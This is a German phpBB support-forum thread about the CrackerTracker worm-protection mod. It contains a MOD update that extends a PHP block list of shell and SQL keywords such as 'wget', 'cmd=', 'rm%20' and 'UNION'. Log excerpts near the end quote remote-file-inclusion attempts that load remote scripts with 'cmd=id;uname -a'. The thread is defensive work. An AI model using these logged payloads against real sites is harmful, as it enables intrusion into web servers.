CBACK CrackerTracker Worm Protector
- oxpus
- Administrator
- Beiträge: 28735
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Sicher, wenn Du bedarf hast, diese extra zu schützen.
Nur sind die Hauptziele immer noch die viewtopic.php und viewforum.php.
Nur sind die Hauptziele immer noch die viewtopic.php und viewforum.php.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
OK dieser da hat ausgedient. Die Revolution wartet hier:
http://www.community.cback.de/viewtopic ... 2544#32544
NEUE VERSION
http://www.community.cback.de/viewtopic ... 2544#32544
NEUE VERSION
Oha. Den hätte Hotschi mal lieber auch installiert ...
http://phpBB.hotschi.de/
http://phpBB.hotschi.de/
hack by iranian haloo group hack by iranian
- oxpus
- Administrator
- Beiträge: 28735
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Na Hotschi hat seit Ewigkeiten nichts mehr gemacht.
Und das Board ist noch ein phpBB 2.0.4.
War dan nur eine Frage der Zeit.
Und das Board ist noch ein phpBB 2.0.4.
War dan nur eine Frage der Zeit.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
kannste dafür mal mein Board testen?
Mein Board
Hehe!
Nein scherz beiseite!
Ich hoffe, deine Aktion läuft noch etwas länger!
Mein Board
Hehe!
Nein scherz beiseite!
Ich hoffe, deine Aktion läuft noch etwas länger!
-
helluvaguy
- Beiträge: 128
- Registriert: Di 06.Apr, 2004 20:22
Es ist sicherlich eine dumme Frage, aber trotzdem muß ich sie stellen.
Was bringt es mir, wenn ich diese Angaben aus der Logdatei habe? Ich weiß zwar nun zu welchen Zeiten diese Scripte meine Site "angreifen" (was inzwischen mir die ungewöhnlich hohe Zahl an Gästen erklärt). Aber was kann ich insbesondere mit der Angabe "Angriffsversuch" anfangen?
Was bringt es mir, wenn ich diese Angaben aus der Logdatei habe? Ich weiß zwar nun zu welchen Zeiten diese Scripte meine Site "angreifen" (was inzwischen mir die ungewöhnlich hohe Zahl an Gästen erklärt). Aber was kann ich insbesondere mit der Angabe "Angriffsversuch" anfangen?
- oxpus
- Administrator
- Beiträge: 28735
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
warum hat er das geblockt? ist doch nur ein bot, oder seh ich da was falsch?20.04.2005, 04:41 65.54.188.87 msnbot/1.0 (+http://search.msn.com/msnbot.htm) topic=Auszeichnungen%20in%20Form%20von%20Orden&link=http://dimension.saab-cars.de/viewtopic.php?t=139
Gruss Volker
http://www.fuchsienfreunde.de
http://www.fuchsienfreunde.de
-
helluvaguy
- Beiträge: 128
- Registriert: Di 06.Apr, 2004 20:22
[quote="oxpus - 4.April 2005, 17:12";p="29401"]Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.[/quote] Oxpus, könntest Du das evtl etwas näher ausführen? Selbst wenn ich weiß, von welcher IP ein solcher Angriff kommt, kann ich doch immer noch keine Schlägertruppe losschicken. Welche Schlüsse kann ich daraus ziehen, wenn ich die Zeiten von Angriffen kenne?
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.[/quote] Oxpus, könntest Du das evtl etwas näher ausführen? Selbst wenn ich weiß, von welcher IP ein solcher Angriff kommt, kann ich doch immer noch keine Schlägertruppe losschicken. Welche Schlüsse kann ich daraus ziehen, wenn ich die Zeiten von Angriffen kenne?
- oxpus
- Administrator
- Beiträge: 28735
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
@helluvaguy
http://www.oxpus.de/kb.php?mode=article&k=35
http://www.oxpus.de/kb.php?mode=article&k=35
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
UPDATE
Das Komplettpaket wurde ebenfalls auf Version 2.0.1 aktualisiert in meiner Downloadsektion. Alle die den ExtremeEdition 2.0.0 installiert haben können sich mit einem kleinen Update gegen den "Nigga" Worm schützen der ein Loch in der phpBB Styleverwaltung im ACP ausnutzt. Das ACP wird auch vor angriffen geschützt.
Hier das UPdate von 2.0.0 auf 2.0.1:
Das Komplettpaket wurde ebenfalls auf Version 2.0.1 aktualisiert in meiner Downloadsektion. Alle die den ExtremeEdition 2.0.0 installiert haben können sich mit einem kleinen Update gegen den "Nigga" Worm schützen der ein Loch in der phpBB Styleverwaltung im ACP ausnutzt. Das ACP wird auch vor angriffen geschützt.
Hier das UPdate von 2.0.0 auf 2.0.1:
Code: Alles auswählen
##############################################################
## MOD Title: Update CrackerTracker v2.0.0 to v2.0.1
## MOD Author: CBACK < sonny@cback.de > (Christian Knerr) http://www.community.cback.de
## MOD Description: This updates CrackerTracker Version (2.0.0) to
## the newest V2.0.1 Version (CrackerTracker XTreme
## Edition 2nd Release)
##############################################################
## For Security Purposes, Please Check: http://www.phpbb.com/mods/downloads/ for the
## latest version of this MOD. Downloading this MOD from other sites could cause malicious code
## to enter into your phpBB Forum. As such, phpBB will not offer support for MODs not offered
## in our MOD-Database, located at: http://www.phpbb.com/mods/downloads/
##############################################################
## Before Adding This MOD To Your Forum, You Should Back Up All Files Related To This MOD
##############################################################
#
#-----[ OPEN ]------------------------------------------
#
common.php
#
#-----[ FIND ]------------------------------------------
#
$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20');
#
#-----[ REPLACE WITH ]------------------------------------------
#
$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20', 'nigga', 'fopen', 'fwrite', '$_REQUEST', '$_GET');
#
#-----[ FIND ]------------------------------------------
#
$cfilesize = count(file("ctrack.txt"));
#
#-----[ REPLACE WITH ]------------------------------------------
#
$cfilesize = count(file($phpbb_root_path . "ctrack.txt"));
#
#-----[ FIND ]------------------------------------------
#
if ($cfilesize > 200) // Maximum entry Number into the Log File
{
$clog = fopen("ctrack.txt", "a");
#
#-----[ REPLACE WITH ]------------------------------------------
#
if ($cfilesize > 200) // Maximum entry Number into the Log File
{
$clog = fopen($phpbb_root_path . "ctrack.txt", "a");
#
#-----[ FIND ]------------------------------------------
#
else
{
$clog = fopen('ctrack.txt', 'a');
#
#-----[ REPLACE WITH ]------------------------------------------
#
else
{
$clog = fopen($phpbb_root_path . 'ctrack.txt', 'a');
#
#-----[ SAVE/CLOSE ALL FILES ]------------------------------------------
#
# EoM
#
# This MOD was created with: CBACK MIRO ModEditor (http://www.community.cback.de)- oxpus
- Administrator
- Beiträge: 28735
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Vielen Dank!
Nun fühlt ich mich schon wieder ein Stück sicherer.
(Hab ja nur noch 4 Updates vor mir...)
Nun fühlt ich mich schon wieder ein Stück sicherer.
(Hab ja nur noch 4 Updates vor mir...)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Der erste Wurm seit bestehen des Boards wurde erfolgreich geblockt
THX @cback !
Code: Alles auswählen
04.05.2005, 16:58 67.108.84.113 Linux pic_id=http://www.thecurse.pop.com.br/sh.jpg?&cmd=id;uname%20-a;w CrackerTracker-Log hat geschrieben:/phpbb2/portal.php?page=http://qwqw.altervista.org/tool25.dat?&cmd=id
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________
Kein Support per PM, ICQ oder eMail!!![/center]
______________________________________
Kein Support per PM, ICQ oder eMail!!![/center]
